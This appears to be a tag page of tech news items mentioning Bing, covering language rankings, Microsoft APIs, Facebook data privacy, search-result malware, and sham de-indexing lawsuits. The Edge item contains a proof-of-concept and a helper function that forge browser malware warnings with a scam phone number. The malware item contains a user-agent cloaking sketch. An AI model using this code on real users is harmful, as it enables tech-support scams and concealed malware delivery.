
Tag: Bing

Go language soars to new heights in popularity

Go, Google's open source, concurrency-friendly programming language, has soared to new heights with developers, cracking the top 10 in the Tiobe index of language popularity for the first time. With an all-time high rating of 2.363 percent, Go ranks as the 10th most popular programming language in this month's index, ahead of languages such as Perl, Swift, Ruby, and Visual Basic.

The Tiobe Programming Community index assesses language popularity using a formula based on the frequency of searches for the languages in popular search engines and sites such as Google, Bing, Baidu, and Wikipedia. Tiobe called Go's latest rise an important landmark and pondered what was next: "Is Go really able to join the big stars in the programming language world and leave languages such as JavaScript and Python behind? We will see." The language was ranked in 55th place in the index a year ago.

Go's previous high score was a 2.325 percent rating in January, when it placed 13th.

Kotlin’s a rising star in language popularity index

Boosted by its ties to Android mobile application development, Kotlin is a rising star in the Tiobe language popularity index. The statically typed language, developed by JetBrains initially for the Java Virtual Machine, reached the top 50 in the index this month for the first time, ranking 43rd, although it has a rating of just 0.346 percent.
Still, this places Kotlin ahead of more-established languages such as Groovy and Erlang. Kotlin was ranked 80th just last month. Software quality services vendor Tiobe's index assesses language popularity based on a formula that examines searches in popular search engines such as Google, Wikipedia, Bing, and Yahoo, looking at the number of skilled engineers, courses, and third-party vendors related to a language.

Windows 10 S forces you to use Edge and Bing

Windows 10 S won't let you change default Web browser or search provider.

CA Purchase of Veracode Doesn’t Signal DevOps Consolidation: Analyst

DAILY BRIEFING: CA's Veracode deal not a sign of DevOps consolidation, analyst argues; Microsoft Power BI template enables intelligent Bing news searches; Google announces new SAP partnership, expands cloud support options; and there's more.

Google and Microsoft agree to demote piracy search results in the...

Deal struck after lengthy spat between search engines and entertainment industry.

Microsoft’s AI APIs add content moderation, speech recognition

If you want your apps to understand what someone's saying or know if your user-content rules are being broken, Microsoft has you covered. Microsoft is expanding its portfolio of Cognitive Services—in-the-cloud APIs that provide out-of-the-box versions of useful algorithms—to include two new services that go into general availability next month: the Content Moderator and Bing Speech APIs.

Talk to me, and I shall hear

Bing Speech converts audio into text and vice versa.
It’s also able to apply contextual understanding to that speech or text.

The Speech API's demo page lets you try a limited sample of both text-to-speech and speech-to-text for yourself.
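Programmatic use of a Cognitive Services-style speech endpoint follows the same shape as the demo: obtain an access token with your subscription key, then POST audio with an Authorization header. The sketch below only assembles such a request; the endpoint URLs, header names, and parameters are assumptions for illustration and should be checked against Microsoft's current documentation.

```python
# Sketch of preparing a Cognitive Services-style speech-to-text request.
# URLs and parameter names are assumptions, not verified API details.
import uuid

TOKEN_URL = "https://api.cognitive.microsoft.com/sts/v1.0/issueToken"  # assumed
STT_URL = "https://speech.platform.bing.com/recognize"                 # assumed

def build_recognition_request(access_token: str, language: str = "en-US") -> dict:
    """Assemble URL, query parameters, and headers for one recognition call."""
    return {
        "url": STT_URL,
        "params": {
            "language": language,
            "requestid": str(uuid.uuid4()),  # unique id per request
        },
        "headers": {
            "Authorization": f"Bearer {access_token}",
            "Content-Type": "audio/wav; samplerate=16000",
        },
    }

req = build_recognition_request("example-token")
print(req["headers"]["Authorization"])
```

In practice you would first POST your subscription key to the token endpoint, then send the WAV bytes to the recognition URL with these headers.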

Google mistakes the entire NHS for massive cyber-attacking botnet

Hospitals advised to use Bing instead

Exclusive: Google is blocking access to the entire NHS network, mistaking the amount of traffic it is currently receiving for a cyber attack…

Facebook already has a Muslim registry—and it should be deleted

A Hollerith machine used in the 1890 US Census. Hollerith's company later merged with three others to create the company that became known as IBM, and similar machines were instrumental in organizing the Holocaust. (Photo: Marcin Wichary)

Since Donald Trump's election, many in the tech industry have been concerned about the way their skills—and the data collected by their employers—might be used. On a number of occasions, Trump has expressed the desire to perform mass deportations and end any and all Muslim immigration. He has also said that it would be "good management" to create a database of Muslims, and that there should be "a lot of systems" to track Muslims within the US. In the final days of his presidency, Barack Obama has scrapped the George W. Bush-era regulations that created a registry of male Muslim foreigners entering the US—the registry itself was suspended in 2011—but given Trump's views, demands to create a domestic registry are still a possibility. As a result, some 2,600 tech workers (and counting) have pledged both not to participate in any such programs and to encourage their employers to minimize any sensitive data they collect.

The goal is to reduce the chance that such data might be used in harmful ways. The fear in the tech community is of being complicit in some great crime.

The neveragain.tech pledge reads, in part:

We have educated ourselves on the history of threats like these, and on the roles that technology and technologists played in carrying them out. We see how IBM collaborated to digitize and streamline the Holocaust, contributing to the deaths of six million Jews and millions of others. We recall the internment of Japanese Americans during the Second World War. We recognize that mass deportations precipitated the very atrocity the word genocide was created to describe: the murder of 1.5 million Armenians in Turkey. We acknowledge that genocides are not merely a relic of the distant past—among others, Tutsi Rwandans and Bosnian Muslims have been victims in our lifetimes. Today we stand together to say: not on our watch, and never again.

Their concerns are not unfounded.
IBM, in particular, has a dark history when it comes to assisting with genocides.

The company's punch card-based Hollerith machines were instrumental in enabling the Nazis to efficiently round up Jews, seize their assets, deport them to concentration camps, and then systematically slaughter them. After Trump's election, IBM CEO Ginni Rometty wrote to the president-elect to congratulate him on his victory and offer IBM's services in support of his agenda. Oracle co-CEO Safra Catz has joined Trump's transition team. Meanwhile, rank-and-file workers have been outspoken in their unwillingness to cooperate with programs that, in their view, don't respect the Constitution or human rights, or that have disturbing historical precedent. Rometty's letter has provoked a petition from current and former IBM staff; Catz's role has resulted in at least one resignation. One company, however, stands head and shoulders above the rest when it comes to collecting personal data: Facebook.

Facebook's business is data collection in order to sell more effectively targeted advertisements. While massive data collection is not new or unique to Facebook—search engines such as Google and Microsoft's Bing have the same feature—Facebook is unusual in that it actively strives to make that information personally identifiable.

Facebook accounts tend to use our legal names, and Facebook relationships tend to reflect our real-life associations, giving the company's data a depth and breadth that Google or Microsoft can only dream about. Among the pieces of personal information that the site asks users for is religion.

As with most pieces of information that Facebook requests, this is of course optional.

But it's an option that many people fill in to ensure that our profiles better reflect who we are. This data collection means that Facebook already represents, among other things, a de facto, if partial, Muslim registry.

Facebook has the data already; the company can provide a list of self-attested Muslims in the US simply by writing a query or two.

That data could be similarly queried for anyone who isn't straight. As such, government coercion of Facebook—or even a hack of the company—represents a particular threat to civil liberties.

Accordingly, Facebook should take a simple and straightforward protective step: delete that information. Remove the field from our profiles, and discard the historic saved data. Deleting the information will not make Facebook safe.
It will still be a treasure trove of relationships and associations, and an intelligence agency could make all manner of inferences from the data contained within. (Religion, for instance, is likely to be discernible from the content of posts and from images of holidays and religious gatherings, but this would be more difficult to do in bulk—though we know similar inferences are already made about race.) But it would mean that Facebook is no longer so trivially searchable, and it would mean that it ceases to be such a clear database of religious affiliation. Making a change like this should be trivial for Facebook. No doubt it would marginally reduce the company's ability to tailor advertisements to individual users—but it would serve as a clear statement against the threat such a database poses.

Microsoft Edge’s malware alerts can be faked, researcher says

Fiddle with a URL and you can pop up and tell users to do anything

Technical support scammers have new bait with the discovery that Microsoft's Edge browser can be abused to display native, legitimate-looking warning messages. The flaws exist in Microsoft's Edge protocols ms-appx: and ms-appx-web:, which the browser uses to present warning messages when phishing or malware-delivery sites are detected. When Edge detects suspected malicious sites, it colours them red with a feature called SmartScreen.

Buenos Aires security tester Manuel Caballero says scammers can create warnings that replace SmartScreen text and phone numbers, indicating that a nominated site also displayed in the address bar is infected. "When we place a telephone-like number a link is automatically created so the user can call us with a single click - very convenient for these scammers," Caballero says. By altering URL characters and appending a hash and a URL of a legitimate-looking site, a technical support scam page can be forged that is much more convincing than the deluge of fake Android and blue-screen-of-death pages common to torrent sites. His proof of concept:

    window.open("ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite%2ehtm?" +
        "BlockedDomain=facebook.com&Host=Technical Support Really Super Legit CALL NOW\:" +
        "800-111-2222#http://www.facebook.com");

Caballero found some of the Edge assets could be loaded directly through the address bar, albeit with errors, such as ms-appx-web://microsoft.microsoftedge/assets/errorpages/PhishSiteEdge.htm, while others would fail and perform a Bing search on the URL instead. Those errors could be avoided by changing a single character in the URL, and the displayed address changed to a legitimate site by appending a hash.
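The trick Caballero demonstrates amounts to string assembly: the block page takes its heading and "blocked" domain from the query string, and anything after the hash replaces the address the user sees. A minimal sketch of that construction (the helper name is ours; the parameter behaviour is as the article describes it, and has presumably since been patched):

```python
def forge_edge_warning(blocked_domain: str, scam_text: str,
                       phone: str, spoof_url: str) -> str:
    # Query-string parameters fill in the warning page's text; the fragment
    # after '#' is what Edge displayed in the address bar, per the article.
    return (
        "ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite%2ehtm"
        f"?BlockedDomain={blocked_domain}"
        f"&Host={scam_text} CALL NOW: {phone}"
        f"#{spoof_url}"
    )

url = forge_edge_warning("facebook.com", "Technical Support Really Super Legit",
                         "800-111-2222", "http://www.facebook.com")
print(url)
```

The auto-linking of phone-like numbers that Caballero notes is what makes the forged page actionable: one tap dials the scammer.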

F-Secure Internet Security (2017)

Just what ingredients go into a security suite? It used to be a pretty clear recipe: antivirus, firewall, antispam, parental control, and various condiments. These days, though, some vendors reward their users by pushing suite-level features down into...

Search engine results increasingly poisoned with malicious links

Almost six times as many web page threats found this year compared to 2013

Malware threats in search results are getting worse despite the best efforts of Google and other vendors. The number of infected results has been increasing year by year since 2013, despite the application of multiple tools and technologies designed to exclude dodgy links, according to a study by independent anti-virus testing outfit AV-TEST.org. The analysed websites originate in various proportions from the search engines of Google, Bing, Yandex, and Faroo.

Additionally, over the past two years, more than 515 million Twitter updates were examined for malicious links. Last year AV-TEST.org examined 80 million websites, spotting 18,280 infected web pages.
In the year up to August, the testing lab inspected a similar 81 million websites, turning up a much higher 29,632 infected web pages.

Both results were recorded without enabling Google Safe Browsing, and both figures are a big increase on 2013, when AV-TEST encountered 5,060 malware threats after examining 40 million web pages. To test Google's filtering, all of the pages with malware threats found by AV-TEST were then visited using the Google Safe Browsing tools.

The results were less than impressive. In 2015, the 18,280 pages with malware threats threw up Google warnings in just 555 cases. In the year to August, the 29,632 malware-tainted pages threw up just 1,337 Google warnings. Links in tweets are infected at almost exactly the same frequency as links filtered by Google.

Graphs illustrating AV-TEST.org's results accompany the report. Maik Morgenstern, chief technology officer at AV-TEST.org, explained that the dynamic content of the web means the lab can see different content from Google/Bing when accessing and scanning a site.

This factor, together with the appearance of malicious ads on previously clean websites, goes some way towards explaining the discrepancy. "It could be the ads on the website that have been flagged as suspicious by us, and that changes every time you access the site," Morgenstern explained. "Or the website is delivering different content randomly, or it does so by checking the user agent or location of the user. Also, I do not know what the interval is at which Google/Bing are scanning the sites for malware. There will always be a certain timeframe where malicious content could be on the site without Google/Bing knowing it, even if they were able to detect it. It is also possible that we flagged content as suspicious that is not considered suspicious by Google/Bing." Google is yet to respond to El Reg's request for comment. Microsoft (Bing) declined to comment.
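Morgenstern's point about user agents describes a well-known cloaking technique: a compromised site answers scanner crawlers with a clean page and serves the payload to everyone else, so a search engine and a test lab can legitimately see different content at the same URL. A minimal, purely illustrative sketch (all names hypothetical):

```python
# Illustrative sketch of user-agent cloaking. A compromised server inspects
# the User-Agent header and hides its payload from known scanner bots,
# which is one reason scanners and real visitors see different content.
SCANNER_MARKERS = ("googlebot", "bingbot", "safebrowsing")

def serve_page(user_agent: str) -> str:
    ua = user_agent.lower()
    if any(marker in ua for marker in SCANNER_MARKERS):
        return "<html>harmless content</html>"  # what the crawler archives
    return "<html><script src='evil.js'></script></html>"  # what a visitor gets

print(serve_page("Googlebot/2.1 (+http://www.google.com/bot.html)"))
print(serve_page("Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36"))
```

Geolocation- and random-based variants Morgenstern mentions work the same way, just keyed on the client's IP or a coin flip instead of the User-Agent string.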

Lawyers file fake lawsuits to de-index online negative reviews, suit says

Two California lawyers are being accused of filing "sham lawsuits" in a wide-ranging conspiracy to get Google and other search engines to de-index negative reviews about their clients.

As the case (PDF) brought by a group called Consumer Opinion states: The other conspirators engaged attorneys Mark W. Lapham ("Lapham") and Owen T. Mascott (“Mascott”) to file sham lawsuits either by the subjects of the negative reviews or by corporations that had no interest in the allegedly defamatory statements, against a defendant who most certainly was not the party that published the allegedly defamatory statements, and the parties immediately stipulated to a judgment of injunctive relief, so the conspirators could provide the order to Google and other search engines, thus achieving the goal of deindexing all pages containing negative reviews. Consumer Opinion runs pissedconsumer.com, and the group says these lawyers essentially manipulated California's legal system by conducting a "rather brilliant but incredibly unethical" scheme to make negative reviews on the site essentially disappear from search results.

The suit asks a federal judge to "discipline them for those misdeeds." The suit notes a complex web of reputation companies and fake or "stooge" defendants working together.

According to the lawsuit, it works like this: the attorneys sue "stooge" defendants over negative reviews—allegedly defamatory reviews published on the pissedconsumer.com site.

But these lawsuit defendants didn't actually write the review, and the suits immediately settle.

The judgments are then used to get Yahoo, Google, and Bing to erase negative reviews from search results.

The suit alleges that a Florida attorney, the subject of some 59 negative reviews on pissedconsumer.com, was among the beneficiaries of the alleged scheme. The lawsuit points out six similarly worded defamation lawsuits lodged in Contra Costa County, just east of San Francisco.

The suits are filed, according to the lawsuit, because pissedconsumer.com won't remove the reviews from its website. "The scam is not all that complicated," Marc Randazza, Consumer Opinion's attorney, wrote in the lawsuit. Mascott did not immediately respond to a request for comment.

The answering machine for Lapham was full, so Ars could not leave a message. This isn't the first time we've seen these types of allegedly fake lawsuits used to try to game search results, according to Paul Alan Levy of Public Citizen and Eugene Volokh of the Volokh Conspiracy. The duo has concluded there are at least 25 cases nationwide with what they call a "suspicious profile." "Of these 25-odd cases, 15 give the addresses of the defendants—but a private investigator hired by Professor Volokh (Giles Miller of Lynx Insights & Investigations) couldn't find a single one of the ostensible defendants at the ostensible address," they wrote. Levy and Volokh pointed out that search engines, when presented with a court order, "can't really know if the injunction was issued against the actual author of the supposed defamation—or against a real person at all."